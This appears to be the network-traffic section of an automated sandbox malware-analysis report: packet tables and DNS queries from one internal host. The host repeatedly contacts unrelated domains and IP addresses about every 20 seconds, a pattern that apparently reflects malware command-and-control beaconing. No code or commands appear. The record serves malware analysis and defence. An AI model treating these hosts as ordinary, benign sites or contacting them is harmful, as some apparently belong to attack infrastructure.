Mar 27, 2023 14:05:11.922029018 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.922074080 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.922156096 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.922245026 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:16.774866104 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:16.775149107 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:33.033385038 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:55.877396107 CEST	49841	80	192.168.11.20	198.185.159.144
Mar 27, 2023 14:05:56.009074926 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.009241104 CEST	49841	80	192.168.11.20	198.185.159.144
Mar 27, 2023 14:05:56.009341955 CEST	49841	80	192.168.11.20	198.185.159.144
Mar 27, 2023 14:05:56.140953064 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.149992943 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.150063992 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.150120020 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.150163889 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.150218964 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.150273085 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.150326967 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.150369883 CEST	49841	80	192.168.11.20	198.185.159.144
Mar 27, 2023 14:05:56.150369883 CEST	49841	80	192.168.11.20	198.185.159.144
Mar 27, 2023 14:05:56.150383949 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.150439978 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.150495052 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.150542974 CEST	49841	80	192.168.11.20	198.185.159.144
Mar 27, 2023 14:05:56.150542974 CEST	49841	80	192.168.11.20	198.185.159.144
Mar 27, 2023 14:05:56.150542974 CEST	49841	80	192.168.11.20	198.185.159.144
Mar 27, 2023 14:05:56.150614977 CEST	49841	80	192.168.11.20	198.185.159.144
Mar 27, 2023 14:05:56.150614977 CEST	49841	80	192.168.11.20	198.185.159.144
Mar 27, 2023 14:05:56.150835037 CEST	49841	80	192.168.11.20	198.185.159.144
Mar 27, 2023 14:05:56.282133102 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.282179117 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.282228947 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.282257080 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.282284975 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.282311916 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.282340050 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.282366991 CEST	80	49841	198.185.159.144	192.168.11.20
Mar 27, 2023 14:05:56.282449961 CEST	49841	80	192.168.11.20	198.185.159.144
Mar 27, 2023 14:05:56.282449961 CEST	49841	80	192.168.11.20	198.185.159.144
Mar 27, 2023 14:05:56.282593012 CEST	49841	80	192.168.11.20	198.185.159.144
Mar 27, 2023 14:05:56.282593012 CEST	49841	80	192.168.11.20	198.185.159.144
Mar 27, 2023 14:06:35.913825989 CEST	49844	80	192.168.11.20	198.54.117.212
Mar 27, 2023 14:06:36.076237917 CEST	80	49844	198.54.117.212	192.168.11.20
Mar 27, 2023 14:06:36.076523066 CEST	49844	80	192.168.11.20	198.54.117.212
Mar 27, 2023 14:06:36.076587915 CEST	49844	80	192.168.11.20	198.54.117.212
Mar 27, 2023 14:06:36.239048004 CEST	80	49844	198.54.117.212	192.168.11.20
Mar 27, 2023 14:06:36.239150047 CEST	80	49844	198.54.117.212	192.168.11.20
Mar 27, 2023 14:07:17.355279922 CEST	49846	80	192.168.11.20	198.54.117.215
Mar 27, 2023 14:07:17.518551111 CEST	80	49846	198.54.117.215	192.168.11.20
Mar 27, 2023 14:07:17.518718958 CEST	49846	80	192.168.11.20	198.54.117.215
Mar 27, 2023 14:07:17.518927097 CEST	49846	80	192.168.11.20	198.54.117.215
Mar 27, 2023 14:07:17.682282925 CEST	80	49846	198.54.117.215	192.168.11.20
Mar 27, 2023 14:07:17.682349920 CEST	80	49846	198.54.117.215	192.168.11.20
Mar 27, 2023 14:07:38.234687090 CEST	49848	80	192.168.11.20	195.179.237.158
Mar 27, 2023 14:07:38.383021116 CEST	80	49848	195.179.237.158	192.168.11.20
Mar 27, 2023 14:07:38.383265018 CEST	49848	80	192.168.11.20	195.179.237.158
Mar 27, 2023 14:07:38.383358955 CEST	49848	80	192.168.11.20	195.179.237.158
Mar 27, 2023 14:07:38.531986952 CEST	80	49848	195.179.237.158	192.168.11.20
Mar 27, 2023 14:07:38.532325983 CEST	80	49848	195.179.237.158	192.168.11.20
Mar 27, 2023 14:07:38.532630920 CEST	49848	80	192.168.11.20	195.179.237.158
Mar 27, 2023 14:07:38.532804966 CEST	80	49848	195.179.237.158	192.168.11.20
Mar 27, 2023 14:07:38.532982111 CEST	49848	80	192.168.11.20	195.179.237.158
Mar 27, 2023 14:07:38.681401014 CEST	80	49848	195.179.237.158	192.168.11.20
Mar 27, 2023 14:07:58.730160952 CEST	49849	80	192.168.11.20	122.201.64.145
Mar 27, 2023 14:07:59.000374079 CEST	80	49849	122.201.64.145	192.168.11.20
Mar 27, 2023 14:07:59.000864029 CEST	49849	80	192.168.11.20	122.201.64.145
Mar 27, 2023 14:07:59.001115084 CEST	49849	80	192.168.11.20	122.201.64.145
Mar 27, 2023 14:07:59.281230927 CEST	80	49849	122.201.64.145	192.168.11.20
Mar 27, 2023 14:07:59.281796932 CEST	49849	80	192.168.11.20	122.201.64.145
Mar 27, 2023 14:07:59.281796932 CEST	49849	80	192.168.11.20	122.201.64.145
Mar 27, 2023 14:07:59.552097082 CEST	80	49849	122.201.64.145	192.168.11.20
Mar 27, 2023 14:08:19.782449007 CEST	49851	80	192.168.11.20	23.27.72.143
Mar 27, 2023 14:08:19.942471027 CEST	80	49851	23.27.72.143	192.168.11.20
Mar 27, 2023 14:08:19.942683935 CEST	49851	80	192.168.11.20	23.27.72.143
Mar 27, 2023 14:08:19.942739010 CEST	49851	80	192.168.11.20	23.27.72.143
Mar 27, 2023 14:08:20.104885101 CEST	80	49851	23.27.72.143	192.168.11.20
Mar 27, 2023 14:08:20.104943991 CEST	80	49851	23.27.72.143	192.168.11.20
Mar 27, 2023 14:08:20.105221033 CEST	49851	80	192.168.11.20	23.27.72.143
Mar 27, 2023 14:08:20.105221987 CEST	49851	80	192.168.11.20	23.27.72.143
Mar 27, 2023 14:08:20.265367985 CEST	80	49851	23.27.72.143	192.168.11.20
Mar 27, 2023 14:09:01.034229994 CEST	49853	80	192.168.11.20	112.196.98.174
Mar 27, 2023 14:09:01.205900908 CEST	80	49853	112.196.98.174	192.168.11.20
Mar 27, 2023 14:09:01.206147909 CEST	49853	80	192.168.11.20	112.196.98.174
Mar 27, 2023 14:09:01.206213951 CEST	49853	80	192.168.11.20	112.196.98.174
Mar 27, 2023 14:09:01.377779961 CEST	80	49853	112.196.98.174	192.168.11.20
Mar 27, 2023 14:09:01.378374100 CEST	80	49853	112.196.98.174	192.168.11.20
Mar 27, 2023 14:09:01.378437996 CEST	80	49853	112.196.98.174	192.168.11.20
Mar 27, 2023 14:09:01.378705025 CEST	49853	80	192.168.11.20	112.196.98.174
Mar 27, 2023 14:09:01.378705025 CEST	49853	80	192.168.11.20	112.196.98.174
Mar 27, 2023 14:09:01.550257921 CEST	80	49853	112.196.98.174	192.168.11.20
Mar 27, 2023 14:09:22.027664900 CEST	49855	80	192.168.11.20	160.121.87.199
Mar 27, 2023 14:09:22.282258034 CEST	80	49855	160.121.87.199	192.168.11.20
Mar 27, 2023 14:09:22.282547951 CEST	49855	80	192.168.11.20	160.121.87.199
Mar 27, 2023 14:09:22.282614946 CEST	49855	80	192.168.11.20	160.121.87.199
Mar 27, 2023 14:09:22.540010929 CEST	80	49855	160.121.87.199	192.168.11.20
Mar 27, 2023 14:09:22.540045977 CEST	80	49855	160.121.87.199	192.168.11.20
Mar 27, 2023 14:09:22.540070057 CEST	80	49855	160.121.87.199	192.168.11.20
Mar 27, 2023 14:09:22.540427923 CEST	49855	80	192.168.11.20	160.121.87.199
Mar 27, 2023 14:09:22.540427923 CEST	49855	80	192.168.11.20	160.121.87.199
Mar 27, 2023 14:09:22.794497013 CEST	80	49855	160.121.87.199	192.168.11.20
Mar 27, 2023 14:09:42.709240913 CEST	49857	80	192.168.11.20	34.102.136.180
Mar 27, 2023 14:09:42.716716051 CEST	80	49857	34.102.136.180	192.168.11.20
Mar 27, 2023 14:09:42.716984987 CEST	49857	80	192.168.11.20	34.102.136.180
Mar 27, 2023 14:09:42.717274904 CEST	49857	80	192.168.11.20	34.102.136.180
Mar 27, 2023 14:09:42.724553108 CEST	80	49857	34.102.136.180	192.168.11.20
Mar 27, 2023 14:09:42.829402924 CEST	80	49857	34.102.136.180	192.168.11.20
Mar 27, 2023 14:09:42.829493999 CEST	80	49857	34.102.136.180	192.168.11.20
Mar 27, 2023 14:09:42.829718113 CEST	49857	80	192.168.11.20	34.102.136.180
Mar 27, 2023 14:09:42.829719067 CEST	49857	80	192.168.11.20	34.102.136.180
Mar 27, 2023 14:09:42.836857080 CEST	80	49857	34.102.136.180	192.168.11.20
Mar 27, 2023 14:10:03.020287991 CEST	49859	80	192.168.11.20	34.117.168.233
Mar 27, 2023 14:10:03.026806116 CEST	80	49859	34.117.168.233	192.168.11.20
Mar 27, 2023 14:10:03.027159929 CEST	49859	80	192.168.11.20	34.117.168.233
Mar 27, 2023 14:10:03.027214050 CEST	49859	80	192.168.11.20	34.117.168.233
Mar 27, 2023 14:10:03.033770084 CEST	80	49859	34.117.168.233	192.168.11.20
Mar 27, 2023 14:10:03.093939066 CEST	80	49859	34.117.168.233	192.168.11.20
Mar 27, 2023 14:10:03.093962908 CEST	80	49859	34.117.168.233	192.168.11.20
Mar 27, 2023 14:10:03.094295025 CEST	49859	80	192.168.11.20	34.117.168.233
Mar 27, 2023 14:10:03.094327927 CEST	49859	80	192.168.11.20	34.117.168.233
Mar 27, 2023 14:10:03.100948095 CEST	80	49859	34.117.168.233	192.168.11.20
Mar 27, 2023 14:10:43.341628075 CEST	49861	80	192.168.11.20	142.250.181.243
Mar 27, 2023 14:10:43.352895975 CEST	80	49861	142.250.181.243	192.168.11.20
Mar 27, 2023 14:10:43.353357077 CEST	49861	80	192.168.11.20	142.250.181.243
Mar 27, 2023 14:10:43.353358030 CEST	49861	80	192.168.11.20	142.250.181.243
Mar 27, 2023 14:10:43.364816904 CEST	80	49861	142.250.181.243	192.168.11.20
Mar 27, 2023 14:10:43.464946985 CEST	80	49861	142.250.181.243	192.168.11.20
Mar 27, 2023 14:10:43.465280056 CEST	80	49861	142.250.181.243	192.168.11.20
Mar 27, 2023 14:10:43.465353012 CEST	49861	80	192.168.11.20	142.250.181.243
Mar 27, 2023 14:10:43.465562105 CEST	49861	80	192.168.11.20	142.250.181.243
Mar 27, 2023 14:10:43.476528883 CEST	80	49861	142.250.181.243	192.168.11.20
Mar 27, 2023 14:11:33.338551998 CEST	49864	80	192.168.11.20	185.53.179.91
Mar 27, 2023 14:11:33.357441902 CEST	80	49864	185.53.179.91	192.168.11.20
Mar 27, 2023 14:11:33.357661963 CEST	49864	80	192.168.11.20	185.53.179.91
Mar 27, 2023 14:11:33.376678944 CEST	80	49864	185.53.179.91	192.168.11.20
Mar 27, 2023 14:11:33.376861095 CEST	49864	80	192.168.11.20	185.53.179.91
Mar 27, 2023 14:11:33.395809889 CEST	80	49864	185.53.179.91	192.168.11.20
Mar 27, 2023 14:11:33.395869017 CEST	80	49864	185.53.179.91	192.168.11.20
Mar 27, 2023 14:11:33.395915031 CEST	80	49864	185.53.179.91	192.168.11.20
Mar 27, 2023 14:11:33.396142006 CEST	49864	80	192.168.11.20	185.53.179.91
Mar 27, 2023 14:11:33.396203041 CEST	49864	80	192.168.11.20	185.53.179.91
Mar 27, 2023 14:11:33.415431976 CEST	80	49864	185.53.179.91	192.168.11.20
Mar 27, 2023 14:11:45.500346899 CEST	49865	80	192.168.11.20	3.64.163.50
Mar 27, 2023 14:11:45.513454914 CEST	80	49865	3.64.163.50	192.168.11.20
Mar 27, 2023 14:11:45.513794899 CEST	49865	80	192.168.11.20	3.64.163.50
Mar 27, 2023 14:11:45.513856888 CEST	49865	80	192.168.11.20	3.64.163.50
Mar 27, 2023 14:11:45.525888920 CEST	80	49865	3.64.163.50	192.168.11.20
Mar 27, 2023 14:11:45.525955915 CEST	80	49865	3.64.163.50	192.168.11.20
Mar 27, 2023 14:11:45.526005030 CEST	80	49865	3.64.163.50	192.168.11.20
Mar 27, 2023 14:11:45.526329994 CEST	49865	80	192.168.11.20	3.64.163.50
Mar 27, 2023 14:11:45.538320065 CEST	80	49865	3.64.163.50	192.168.11.20
Mar 27, 2023 14:12:05.753643036 CEST	49867	80	192.168.11.20	202.95.14.233
Mar 27, 2023 14:12:05.967183113 CEST	80	49867	202.95.14.233	192.168.11.20
Mar 27, 2023 14:12:05.967453003 CEST	49867	80	192.168.11.20	202.95.14.233
Mar 27, 2023 14:12:05.967515945 CEST	49867	80	192.168.11.20	202.95.14.233
Mar 27, 2023 14:12:06.180970907 CEST	80	49867	202.95.14.233	192.168.11.20
Mar 27, 2023 14:12:06.181008101 CEST	80	49867	202.95.14.233	192.168.11.20
Mar 27, 2023 14:12:06.181035995 CEST	80	49867	202.95.14.233	192.168.11.20
Mar 27, 2023 14:12:06.181293964 CEST	49867	80	192.168.11.20	202.95.14.233
Mar 27, 2023 14:12:06.181293964 CEST	49867	80	192.168.11.20	202.95.14.233
Mar 27, 2023 14:12:06.394650936 CEST	80	49867	202.95.14.233	192.168.11.20
Mar 27, 2023 14:12:26.462188005 CEST	49868	80	192.168.11.20	64.190.63.111
Mar 27, 2023 14:12:26.472711086 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.472928047 CEST	49868	80	192.168.11.20	64.190.63.111
Mar 27, 2023 14:12:26.472981930 CEST	49868	80	192.168.11.20	64.190.63.111
Mar 27, 2023 14:12:26.514091015 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.514168978 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.514230013 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.514285088 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.514341116 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.514395952 CEST	49868	80	192.168.11.20	64.190.63.111
Mar 27, 2023 14:12:26.514415026 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.514463902 CEST	49868	80	192.168.11.20	64.190.63.111
Mar 27, 2023 14:12:26.514509916 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.514575958 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.514602900 CEST	49868	80	192.168.11.20	64.190.63.111
Mar 27, 2023 14:12:26.514662981 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.514725924 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.514755964 CEST	49868	80	192.168.11.20	64.190.63.111
Mar 27, 2023 14:12:26.514909029 CEST	49868	80	192.168.11.20	64.190.63.111
Mar 27, 2023 14:12:26.525616884 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.525696039 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.525753975 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.525809050 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.525865078 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.525882006 CEST	49868	80	192.168.11.20	64.190.63.111
Mar 27, 2023 14:12:26.525966883 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.526016951 CEST	49868	80	192.168.11.20	64.190.63.111
Mar 27, 2023 14:12:26.526051998 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.526133060 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.526160002 CEST	49868	80	192.168.11.20	64.190.63.111
Mar 27, 2023 14:12:26.526221037 CEST	80	49868	64.190.63.111	192.168.11.20
Mar 27, 2023 14:12:26.526318073 CEST	49868	80	192.168.11.20	64.190.63.111
Mar 27, 2023 14:12:26.526525021 CEST	49868	80	192.168.11.20	64.190.63.111
Mar 27, 2023 14:12:26.526525974 CEST	49868	80	192.168.11.20	64.190.63.111
Mar 27, 2023 14:12:26.537374973 CEST	80	49868	64.190.63.111	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 27, 2023 14:05:55.827727079 CEST	50031	53	192.168.11.20	1.1.1.1
Mar 27, 2023 14:05:55.876261950 CEST	53	50031	1.1.1.1	192.168.11.20
Mar 27, 2023 14:06:16.304949999 CEST	64204	53	192.168.11.20	1.1.1.1
Mar 27, 2023 14:06:16.733705997 CEST	53	64204	1.1.1.1	192.168.11.20
Mar 27, 2023 14:06:16.734230995 CEST	64204	53	192.168.11.20	9.9.9.9
Mar 27, 2023 14:06:17.741803885 CEST	64204	53	192.168.11.20	9.9.9.9
Mar 27, 2023 14:06:17.770481110 CEST	53	64204	9.9.9.9	192.168.11.20
Mar 27, 2023 14:06:18.723494053 CEST	53	64204	9.9.9.9	192.168.11.20
Mar 27, 2023 14:06:35.894350052 CEST	53556	53	192.168.11.20	1.1.1.1
Mar 27, 2023 14:06:35.913016081 CEST	53	53556	1.1.1.1	192.168.11.20
Mar 27, 2023 14:06:56.389681101 CEST	58096	53	192.168.11.20	1.1.1.1
Mar 27, 2023 14:06:57.191483974 CEST	53	58096	1.1.1.1	192.168.11.20
Mar 27, 2023 14:07:17.338474989 CEST	65442	53	192.168.11.20	1.1.1.1
Mar 27, 2023 14:07:17.354482889 CEST	53	65442	1.1.1.1	192.168.11.20
Mar 27, 2023 14:07:37.834023952 CEST	53745	53	192.168.11.20	1.1.1.1
Mar 27, 2023 14:07:37.875994921 CEST	53	53745	1.1.1.1	192.168.11.20
Mar 27, 2023 14:07:37.876357079 CEST	53745	53	192.168.11.20	9.9.9.9
Mar 27, 2023 14:07:38.233808994 CEST	53	53745	9.9.9.9	192.168.11.20
Mar 27, 2023 14:07:58.673422098 CEST	60435	53	192.168.11.20	1.1.1.1
Mar 27, 2023 14:07:58.729476929 CEST	53	60435	1.1.1.1	192.168.11.20
Mar 27, 2023 14:08:19.465405941 CEST	51823	53	192.168.11.20	1.1.1.1
Mar 27, 2023 14:08:19.781344891 CEST	53	51823	1.1.1.1	192.168.11.20
Mar 27, 2023 14:08:40.257788897 CEST	53211	53	192.168.11.20	1.1.1.1
Mar 27, 2023 14:08:40.651892900 CEST	53	53211	1.1.1.1	192.168.11.20
Mar 27, 2023 14:08:40.652369976 CEST	53211	53	192.168.11.20	9.9.9.9
Mar 27, 2023 14:08:40.870115042 CEST	53	53211	9.9.9.9	192.168.11.20
Mar 27, 2023 14:09:01.018786907 CEST	63167	53	192.168.11.20	1.1.1.1
Mar 27, 2023 14:09:01.033582926 CEST	53	63167	1.1.1.1	192.168.11.20
Mar 27, 2023 14:09:21.530215025 CEST	51915	53	192.168.11.20	1.1.1.1
Mar 27, 2023 14:09:22.026799917 CEST	53	51915	1.1.1.1	192.168.11.20
Mar 27, 2023 14:09:42.682115078 CEST	58205	53	192.168.11.20	1.1.1.1
Mar 27, 2023 14:09:42.707878113 CEST	53	58205	1.1.1.1	192.168.11.20
Mar 27, 2023 14:10:02.974354029 CEST	52134	53	192.168.11.20	1.1.1.1
Mar 27, 2023 14:10:03.019469976 CEST	53	52134	1.1.1.1	192.168.11.20
Mar 27, 2023 14:10:23.510802984 CEST	65428	53	192.168.11.20	1.1.1.1
Mar 27, 2023 14:10:23.570672035 CEST	53	65428	1.1.1.1	192.168.11.20
Mar 27, 2023 14:10:23.571233988 CEST	65428	53	192.168.11.20	9.9.9.9
Mar 27, 2023 14:10:24.578478098 CEST	65428	53	192.168.11.20	9.9.9.9
Mar 27, 2023 14:10:25.182771921 CEST	53	65428	9.9.9.9	192.168.11.20
Mar 27, 2023 14:10:25.489774942 CEST	53	65428	9.9.9.9	192.168.11.20
Mar 27, 2023 14:10:43.294020891 CEST	53942	53	192.168.11.20	1.1.1.1
Mar 27, 2023 14:10:43.340749025 CEST	53	53942	1.1.1.1	192.168.11.20
Mar 27, 2023 14:11:33.267904043 CEST	55566	53	192.168.11.20	1.1.1.1
Mar 27, 2023 14:11:33.337788105 CEST	53	55566	1.1.1.1	192.168.11.20
Mar 27, 2023 14:11:45.483788013 CEST	54299	53	192.168.11.20	1.1.1.1
Mar 27, 2023 14:11:45.499573946 CEST	53	54299	1.1.1.1	192.168.11.20
Mar 27, 2023 14:12:05.729160070 CEST	62333	53	192.168.11.20	1.1.1.1
Mar 27, 2023 14:12:05.752736092 CEST	53	62333	1.1.1.1	192.168.11.20
Mar 27, 2023 14:12:26.334177017 CEST	63491	53	192.168.11.20	1.1.1.1
Mar 27, 2023 14:12:26.460947990 CEST	53	63491	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 27, 2023 14:05:55.827727079 CEST	192.168.11.20	1.1.1.1	0x3372	Standard query (0)	www.goodlifeprojectofficial.com	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:06:16.304949999 CEST	192.168.11.20	1.1.1.1	0xac18	Standard query (0)	www.tmcgroup.africa	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:06:16.734230995 CEST	192.168.11.20	9.9.9.9	0xac18	Standard query (0)	www.tmcgroup.africa	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:06:17.741803885 CEST	192.168.11.20	9.9.9.9	0xac18	Standard query (0)	www.tmcgroup.africa	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:06:35.894350052 CEST	192.168.11.20	1.1.1.1	0xb4ed	Standard query (0)	www.anotherworldrecord.com	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:06:56.389681101 CEST	192.168.11.20	1.1.1.1	0x1902	Standard query (0)	www.leqidt.tax	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:07:17.338474989 CEST	192.168.11.20	1.1.1.1	0x3bbc	Standard query (0)	www.crosswalkconsulting.co.uk	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:07:37.834023952 CEST	192.168.11.20	1.1.1.1	0x70ce	Standard query (0)	www.funtime28.online	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:07:37.876357079 CEST	192.168.11.20	9.9.9.9	0x70ce	Standard query (0)	www.funtime28.online	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:07:58.673422098 CEST	192.168.11.20	1.1.1.1	0x3a41	Standard query (0)	www.couragetokingdom.com	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:08:19.465405941 CEST	192.168.11.20	1.1.1.1	0x4152	Standard query (0)	www.peterslawonline.com	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:08:40.257788897 CEST	192.168.11.20	1.1.1.1	0x575b	Standard query (0)	www.kevinjasperinc.africa	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:08:40.652369976 CEST	192.168.11.20	9.9.9.9	0x575b	Standard query (0)	www.kevinjasperinc.africa	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:09:01.018786907 CEST	192.168.11.20	1.1.1.1	0x5fef	Standard query (0)	www.bestpetfinds.com	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:09:21.530215025 CEST	192.168.11.20	1.1.1.1	0x77b8	Standard query (0)	www.anjin98.com	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:09:42.682115078 CEST	192.168.11.20	1.1.1.1	0x9c5f	Standard query (0)	www.bizformspro.com	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:10:02.974354029 CEST	192.168.11.20	1.1.1.1	0x41d1	Standard query (0)	www.lapalmaaccesible.com	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:10:23.510802984 CEST	192.168.11.20	1.1.1.1	0x20ca	Standard query (0)	www.bril-kre-l25.buzz	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:10:23.571233988 CEST	192.168.11.20	9.9.9.9	0x20ca	Standard query (0)	www.bril-kre-l25.buzz	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:10:24.578478098 CEST	192.168.11.20	9.9.9.9	0x20ca	Standard query (0)	www.bril-kre-l25.buzz	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:10:43.294020891 CEST	192.168.11.20	1.1.1.1	0x2440	Standard query (0)	www.edelman-production.com	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:11:33.267904043 CEST	192.168.11.20	1.1.1.1	0xc008	Standard query (0)	www.credit-cards-54889.com	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:11:45.483788013 CEST	192.168.11.20	1.1.1.1	0x51d3	Standard query (0)	www.licensescape.com	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:12:05.729160070 CEST	192.168.11.20	1.1.1.1	0xf60e	Standard query (0)	www.emiu6696.com	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:12:26.334177017 CEST	192.168.11.20	1.1.1.1	0x8892	Standard query (0)	www.dinero.news	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 27, 2023 14:05:55.876261950 CEST	1.1.1.1	192.168.11.20	0x3372	No error (0)	www.goodlifeprojectofficial.com	ext-sq.squarespace.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2023 14:05:55.876261950 CEST	1.1.1.1	192.168.11.20	0x3372	No error (0)	ext-sq.squarespace.com		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:05:55.876261950 CEST	1.1.1.1	192.168.11.20	0x3372	No error (0)	ext-sq.squarespace.com		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:05:55.876261950 CEST	1.1.1.1	192.168.11.20	0x3372	No error (0)	ext-sq.squarespace.com		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:05:55.876261950 CEST	1.1.1.1	192.168.11.20	0x3372	No error (0)	ext-sq.squarespace.com		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:06:16.733705997 CEST	1.1.1.1	192.168.11.20	0xac18	Server failure (2)	www.tmcgroup.africa	none	none	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:06:17.770481110 CEST	9.9.9.9	192.168.11.20	0xac18	Server failure (2)	www.tmcgroup.africa	none	none	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:06:18.723494053 CEST	9.9.9.9	192.168.11.20	0xac18	Server failure (2)	www.tmcgroup.africa	none	none	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:06:35.913016081 CEST	1.1.1.1	192.168.11.20	0xb4ed	No error (0)	www.anotherworldrecord.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2023 14:06:35.913016081 CEST	1.1.1.1	192.168.11.20	0xb4ed	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:06:35.913016081 CEST	1.1.1.1	192.168.11.20	0xb4ed	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:06:35.913016081 CEST	1.1.1.1	192.168.11.20	0xb4ed	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:06:35.913016081 CEST	1.1.1.1	192.168.11.20	0xb4ed	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:06:35.913016081 CEST	1.1.1.1	192.168.11.20	0xb4ed	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:06:35.913016081 CEST	1.1.1.1	192.168.11.20	0xb4ed	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:06:35.913016081 CEST	1.1.1.1	192.168.11.20	0xb4ed	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:06:57.191483974 CEST	1.1.1.1	192.168.11.20	0x1902	Name error (3)	www.leqidt.tax	none	none	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:07:17.354482889 CEST	1.1.1.1	192.168.11.20	0x3bbc	No error (0)	www.crosswalkconsulting.co.uk	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
